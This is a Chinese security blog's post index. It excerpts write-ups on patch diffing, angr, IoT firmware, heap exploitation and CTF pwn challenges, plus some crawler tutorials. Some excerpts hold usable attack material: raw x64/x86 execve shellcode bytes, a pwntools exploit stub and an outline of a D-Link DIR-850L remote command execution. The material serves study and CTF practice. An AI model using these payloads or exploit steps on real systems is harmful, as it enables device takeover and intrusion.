自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

九层台

鱼跃此时海

  • 博客(145)
  • 资源 (4)
  • 收藏
  • 关注

原创 PatchScope: Memory Object Centric Patch Diffing

PatchScope: Memory Object Centric Patch Diffing介绍分析目的是为了定位补丁,通过丰富的语意解释为什么要添加补丁。分析补丁的根源,理解补丁细节。定位补丁二进制区分技术 [27, 34, 49][7, 25, 29] 用静态特征控制流图。动态行为如系统调用[5, 64][16, 18, 21, 22, 71]。 上面两种技术在漏洞检测方面的应用[40, 60, 64] 软件抄袭方面的应用。[5, 12, 44, 70]混淆抗混淆恶意软件比较分析补丁

2021-04-27 15:15:13 80

原创 Unsupervised-Features-Learning-For-Binary-Similarity项目的分析--数据收集

说明更多详细内容查看https://github.com/tower111/binary_volnerablity_mining/blob/master/%E6%95%B0%E6%8D%AE%E6%94%B6%E9%9B%86.md这是对https://github.com/lucamassarelli/Unsupervised-Features-Learning-For-Binary-Similarity项目的分析,这里只是完成对数据收集部分(dataset_creation目录)的分析里面主要

2020-07-22 15:01:29 1594

原创 struc2vec介绍

struc2vec说明本文从官方提供的 ppt 出发,主要是进行一些介绍,并不涉及复杂公式的讲解,详细的公式讲解见底部的参考文章。Node Representations将网络节点映射到另一个空间中,这个空间叫欧式空间(Euclidean space)这里介绍了三种不同方式第一个保留网络距离:所谓的距离是一个节点到另一个节点需要经过几个节点(分层)第三个根据节点度的不同进行分类Structural Identity(结构性身份)节点是什么。节点识别方法上图描述了强结构化等价(

2020-07-18 22:34:07 1711

原创 网鼎杯玄武pwn(第四场)

pwn1就是爆破一下,记下来以后接着用from pwn import *p = remote('182.92.212.76', 31204)p.recvuntil('x[:20] = ')target = p.recvuntil('\n',True)p.recvuntil('<built-in function openssl_')x = p.recvuntil('>',True)funtable = { "sha224":hashlib.sha224, "md5

2020-05-21 20:02:07 252 1

原创 搭建iot动态调试环境

0x01软件安装交叉编译链安装交叉编译链(mips)sudo apt-get install linux-libc-dev-mips-cross sudo apt-get install libc6-mips-cross libc6-dev-mips-cross sudo apt-get install binutils-mips-linux-gnu gcc-mips-linux-gnu ...

2020-04-08 18:51:22 337

原创 固件提取方法总结与手动解压
原力计划

0x01简述总结提取固件的方法并且手动提取固件的方法。这段时间一直遇到的问题就是想分析一个固件的时候下载下来发解binwalk -Me xxx.bin j解压之后找不到想要的文件查了一些文档,整理了一下。0x02固件提取ftp协议或者是http协议的get请求不过一般情况下使用的是下面这种烧录器![在这里插入图片描述](https://img-blog.csdnimg.cn/2...

2020-04-01 16:39:27 2282

原创 iot动态调试环境构建(docker)

获取docker pull skysider/multiarch-docker:compile官方使用说明文档https://github.com/skysider/multiarch-docker构建容器方法docker run -it --rm -h iot --name iot -v /c/Users/36205/Documents/work:/work/ctf -p 1000:10...

2020-03-31 10:37:55 173

原创 dlink850l两个漏洞获取shell
原力计划

0x01dlink850l远程命令执行漏洞当管理员接口的配置信息发生改变时,变化的配置信息会以 xml 的数据格式发送给 hedwig.cgi ,由 hedwig.cgi 重载并应用这些配置信息,而在接受这个数据前,程序并没有对用户身份进行判断,导致非管理员用户也可向 hedwig.cgi 发送XML数据。在接收 XML 数据的过程中, hedwig.cgi 会调用 htdocs/webin...

2020-03-30 09:53:48 321

原创 第一个iot漏洞分析d-link 850L路由器漏洞分析
原力计划

ftp://ftp2.dlink.com/PRODUCTS/DIR-850L/REVA/DIR-850L_REVA_FIRMWARE_1.14.B07_WW.ZIP固件下载地址分析工具1.attifyOs虚拟机(里面的~/tools/firmware-analysis-toolkit工具)2.binwalk binwalk -eM xxx.bin解压查看bin文件系统3.Ghidra...

2020-03-26 12:04:54 911

原创 how2heap注意点总结-上

1.chunk的申请机制,在申请chunk的时候满足first-fit算法(从unsorted bin中遍历遇到第一个比需要chunk大的chunk切割,然后遍历unsorted bin链对应chunk放入对应位置)(所需chunk大小大于small bin或者small bin中没有找到恰好满足的chunk大小,或者fastbin中没有找到合适的chunk大小会引起fast bins遍历合并放...

2020-03-11 15:45:08 473

原创 l-ctf2016–pwn200 hose-of-spirite

这里看可以输入48个字节,最后没有跟00能够泄露出来rbp从ida上面看是这样的,id并没有保存。但是实际上id被保存到了这里。var_38被定义为刚好再输入的name上面。在栈上显示如下图#coding=utf-8from pwn import *context(arch='amd64',os='linux')context.log_level = 'debug'p =...

2020-03-09 19:31:12 160

原创 Hitcon 2016 SleepyHolder-fastbin_dup_consolidate

#include <stdio.h>#include <stdlib.h>#include <string.h>#include <signal.h>#include <fcntl.h>#include <sys/stat.h>#include <sys/types.h>#define BASE 4...

2020-03-08 13:30:48 205

原创 PWN学习整理栈溢出到堆利用(含举例)

文章将整理从入门栈溢出到堆house系列的梳理。0x01栈知识call 将当前的IP或者CS和IP压入栈中。 转移汇编:call xxx push IP jmp xxxret 将程序的返回地址弹出到ip寄存器中 程序继续执行汇编: pop IP有call就要有传参,32位系统用栈来传参参数是倒着传进去也就是最后的参数先push64位系统用寄存器来传参前三个参数是...

2020-02-20 21:58:48 994

原创 恶意代码特征

0x01加壳判断方法:1.节区名字2.熵  加过壳的可执行文件有的节区为空熵等于0,可能所有数据全在一个一个节区里(大于0-7)0x02行为探查行为FindFirstFile() FindNextFile()获取特定目录中所有文件列表Process32First() Process32Next()获取当前系统中运行的进程列表 函数存在于kernel32.dll攻击行为1.进...

2020-01-09 16:29:07 519 1

原创 docker使用

参考https://www.runoob.com/docker/docker-dockerfile.html刚安装需要登录登录docker login拉取镜像文件sudo docker pull ubuntu:16.04查看本地镜像信息sudo docker images删除镜像文件sudo docker rmi ubuntu:16.04容器创建容器-i: 交互式操作。-t...

2020-01-05 19:39:22 136

原创 angr学习[5]--代码整理(总结)

0x01探索模板import angrimport claripyimport sysdef main(argv): path_to_binary = "15_angr_arbitrary_read" project = angr.Project(path_to_binary) # You can either use a blank state or an entry ...

2020-01-04 12:51:39 554

原创 angr使用[4]--用angr测试漏洞是否可用

0x15测试流程设初始状态:  设置hook函数,声明要获取输入的变量设置成功失败状态: 检查运行到某一地址时内存数据的值,可以用copied_state = state.copy() 探测之后添加限制条件来检查最终结果是否符合要求解析成功数据:对声明的变量解析得到输入,解析得到格式化输入,添加限制条件解析出来最终的值#检测程序漏洞,并且检测这个漏洞能否被利用import angr...

2020-01-04 10:18:33 381

原创 angr使用[3]--使用技巧

0x08对探索结果添加限制#跳过一些函数来求解import angrimport claripyimport sysimport binasciidef main(argv): path_to_binary = "08_angr_constraints" project = angr.Project(path_to_binary) start_address = 0x...

2020-01-04 09:25:51 762

原创 angr[2]--使用操作

这里将会写angr模拟bss段,模拟堆,模拟文件,结合上一篇中写的模拟寄存器,模拟内存组成一个完整体系补充:格式化是angr的弱点,需要尽量避开0x01模拟bass段import angrimport claripyimport sysimport binasciidef main(argv): path_to_binary = "./05_angr_symbolic_memo...

2019-12-31 19:48:33 499

原创 装系统(装一个好看的ubuntu遇到的一些坑 和linux 使用实用技巧)

0x01考研感受考完政治,妈呀终于可以上厕所了。考完英语,作文让写的啥ennnnnnnn,,,,,考完数学,要不下午不来了吧(2019考2020)妈呀这数学是真难,大题一堆不会。考完专业课,我干嘛去呀。终于坐上了实验室的软椅子(PS:图书馆是硬椅子)敲键盘太舒服了,感动得想哭。那么久没碰电脑,想开工第一件事当然是装系统了。0x02装系统踩坑之前装过ubuntu 那丑桌面,动不动崩...

2019-12-30 10:38:15 186

原创 基于自动驾驶的虚拟感知展示(avs)

0x01是什么提供了一个展示自动驾驶小车收集到的数据的方式需要数据:kiitti数据,这里只是用了别人已经收集好的kitti数据。这个项目可以实现展示视频,展示收集到的点云数据效果:(这里我进行过了处理:为了加快访问的速度去除了视频,减少了点云的点数。后面会有具体的处理)学习地址:AVS主页https://avs.auto/#/streetscape.gl/getting-sta...

2019-08-25 16:11:10 768 16

原创 angr学习[1]简单加载程序分析,设置寄存器

0x01简介之前学了一些但是后来没有跟进,慢慢忘了,最近找到一个比较好的学习github项目,系统地重新学一下angr是一种模糊执行工具,不是太清楚怎么做的但是比直接爆破要好很多就对了。并且angr提供了一个强大的功能,可以加载分析人以平台下的二进制文件。原github项目地址https://github.com/jakespringer/angr_ctf下面的代码会给出两部分1.官...

2019-06-28 22:16:16 916

原创 python制作图表(爬取数据之后分析最后制成图表)

0x01数据收集这里使用python爬取招聘信息存到数据库。这个脚本只负责收集,收集之后保存到数据库为了加快爬取速度这里采用多进程方式。脚本详情参考https://blog.csdn.net/qq_38204481/article/details/93890794这里进行了一些修改,修复了一些bug# -*- coding:utf-8 -*-from multiprocessing ...

2019-06-28 21:50:06 8004

原创 使用python爬虫爬取51job(静态网页)的招聘信息,保存到数据库和cvs表格,压缩,发送邮件

0x01文件构架和实现功能需要采集数据需要sqlite 存储数据表格存储数据(这里用cvs格式比较简单)发送压缩再发送邮件会从51job网站上爬取招聘工作的信息,保存到cvs表格文件中,和数据库中,然后把表格中的数据压缩,通过邮箱发送给别人。运行输出0x02注意点1.采集数据动态网站和静态网站是不同的,静态网站用可以接收到html,直接用xpath解析。动态网站是用js解析的 ...

2019-06-27 18:38:14 1499

原创 爬虫批量下载酷我音乐(用酷我音乐客户端)

0x01注意点标准json字符串用json.loads(result) 转化,里面好多冒号,并且是双引号可以在线简单观察https://www.json.cn/单引号不是标准json这决定了处理方式的不同loads是双引号转字典的方式,eval是单引号的转字典方式hot_songs = json.loads(result)songs=eval(music_list)0x02使用简...

2019-06-26 18:07:33 1579

原创 python爬虫数和数据库制作微信查电影小程序

0x01构架1.采集信息采集小调网信息保存到数据库中2.微信小程序监听收到的消息,如果收到消息发送帮助,如果收到的消息包含电影:或者电影:查询数据库找到要对应数据反馈给对方效果:0x02采集信息部分更详细爬虫帮助查看https://blog.csdn.net/qq_38204481/article/details/93649458有一点需要注意,网页查看元素上面显示的内容可能跟...

2019-06-25 21:21:32 510

原创 python爬虫初学

0x01环境搭建import osimport requestsfrom lxml import etreefrom urllib.parse import urljoinimport urllibpip installl 包名字0x02介绍这里写了一个爬网站图片的爬虫脚本遇到的第一个问题是中文乱码response.encoding=response.apparent_en...

2019-06-25 20:49:25 310 1

原创 iscc reverse

0x01dig_dig_dig__int64 __fastcall main(int a1, char **a2, char **a3){ size_t v3; // rax char *dest; // ST18_8 size_t v5; // rax __int64 v6; // rax __int64 v7; // rax char *v8; // ST18_8...

2019-05-28 11:47:24 221

原创 isccpwn2[不能获取索引地址空间的堆溢出](main_arena结构,got表存放)

main_arena里面的内容pwndbg> x /20xg 0x7fed08ed9af00x7fed08ed9af0 <_IO_wide_data_0+304>: 0x00007fed08ed8260 0x00000000000000000x7fed08ed9b00 <__memalign_hook>: 0x00007fed08b9ae20 0x00007fe...

2019-05-28 11:46:32 321

原创 ret2dlresolve利用方法

使用场景:一遍运行(延迟绑定技术,只有在第一次调用该函数时才会调用_dll_runtime_resolve函数)没有输出,没有system函数。需要:1.向一个固定地址写入数据(bss段)2.能够劫持程序执行流linux下c函数是放在libc库里面的ldd pwn01 linux-gate.so.1 => (0xf7ef2000) libc.s...

2019-05-10 16:16:23 973 5

原创 2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]

0x01your_pwn Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled保护全开的栈地址任意写v4的索引是可以输入的,也会输出v4数组的内容。比较麻烦的是每次只能读写一...

2019-04-25 17:11:30 1122

原创 diy树莓派小车i2c通信

从说是什么都不懂整出来一个小车,踩了不少坑还烧坏了点硬件ennnnnn。0x01硬件选择1.小车底盘:小车底盘就是一块铁板,需要几个电机建议直接淘宝买,有带电机的,很省事。电机并不是越多越好,我的是六个电机,结果买驱动的时候没有那么多步进电机引脚。四个或者2个就很好2.电机驱动:这个需要注意的是控制板和驱动之间的控制方式。是i2c还是gpio(我的是i2c奇果派工坊的网上的代码还是gpio的...

2019-02-24 20:42:56 611 6

原创 pwnable(echo2)【64位格式化字符串&uaf】

和echo1差不多都没开启任何保护,有一个格式化字符串漏洞64位格式化字符串和32位有些不同64位寄存器是靠寄存器来传参的(说白了格式化字符串就是打印参数的值,或者向参数位置指向的地址处写入数据)64位寄存器传参的顺序: rdi, rsi, rdx, rcx, r8, r9这是执行printf时候的状态。这个是输出的数据0x1cd605f,0x7f81ace85790,0x70252...

2019-01-26 12:01:27 357 3

原创 好用的shellcode

给师傅要了一组好用的shellcode1.短。2.没有空格符,换行符好用shellcode :shellcode_x64 = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"shellcode_x86 = "\x31\xc9\xf7\xe1\x51...

2019-01-25 16:11:17 466

原创 pwnable(echo1)【栈溢出shellcode模板】

这个题目可以作为一个栈溢出使用shellcode的模板,它除了给出栈溢出,关闭了NX和canary保护其他的什么都没有给。这里的溢出,看一下它的上一级输入1会执行它。我的想法是没有地址我就找rop来泄露libc,或者栈的地址但是看了一下没有能用的rop换个思路,导入shellcode,用jmp esp指令作为跳转(这个可以作为导入shellcode的一种通用思路)。查了一下en...

2019-01-25 16:02:58 403

原创 pwnable[dragon](uaf)

很有意思的一个题目,做成了一个打龙,要是有个图形界面就更有意思了。这个题出乎意料的地方是漏洞的地方仅仅是free了之后对里面的值再操作。我的思维总以为一定要free了之后再malloc才会有漏洞的。改掉这个思维定式。分析开始。0x01数据结构在这里可以看出来0x02漏洞分析PriestAttack函数中无论杀没杀死龙都会把龙free但是在这里继续使用了龙结构里面的值。接下来就是...

2019-01-24 19:45:32 130

原创 angr使用2

angr就是一个工具提供了对一个程序某一段代码的测试功能,在ctf中一般其实就是用来爆破。之前一个示例演示了基本的运行,接下来呢看一下如果程序不从头开始,设置运行环境。上面是个base64解密,下面是另一个加密,前面的没必要测试,看后面的。看汇编代码原始数据的赋值是R0决定的(也就是用R0来传参的)#coding=utf-8import angrimport claripyi...

2018-12-17 12:25:45 583

原创 angr尝试

中文简介添加链接描述但是官方github上的pdf文档介绍的更详细。测试了一下中文简介的内容大概就这些,只是测试加上个人理解,不一定正确不喜勿喷#coding=utf-8import angrb=angr.Project("./level2")print (hex(b.entry)) #程序的载入地址print hex(b.loader.min_addr), hex(b.loa...

2018-12-16 21:27:42 474

原创 第一次漏洞分析(暴雷漏洞CVE-2012-1889)

作为第一次分析,从萌新的角度分析一下漏洞。环境windows xp sp3ie 6漏洞出现模块msxml3.dll那么老xp版本还没有pie直接找这个地址就行,美滋滋。系统好像是延迟绑定的,在刚开始的时候这个模块并没有加载,让程序运行结束在ctl+g就能找到这个地址了。触发脚本&lt;html&gt;&lt;head&gt; &lt;title&gt;CVE 2012-...

2018-11-30 21:36:18 651

原创 骇极杯[what's it]

__main(); v8 = 0; v9 = 0; v10 = 0; memset(v6, 0, sizeof(v6)); v7 = 0; v5 = 0; v4 = 0; v15 = 0; v14 = 0; printf("Please input your luck string:"); scanf("%s", &amp;v8); if ( str...

2018-11-28 19:11:58 101

mips大端架构32位gdbserver-7.11.1

用gdb-7.11编译的gdbserver,静态链接,大端mips架构 ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=062b51edc22a5ae78fc1f31debbc534c6accce84, not stripped

2020-04-08

pprintf.elf

博客格式化字符串漏洞模板里面一个练习题目,不过资源分好像不能设置为0

2018-05-15

ghidra_9.0.zip

ghidra9.0,用于反编译很多架构的二进制文件,相比起ida虽然体验差了一点,但是可以反编译很多平台,还是挺不错的。 官网好像崩了,百度云盘分享太慢了,找来找去还是csdn比较稳,所需积分为0,免费下载比较香。

2020-05-02

二进制脱壳

主要写的是脱壳有关关的方法哦,我是二进制安全方面的学生,大家都可以看一看.

2017-10-06

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除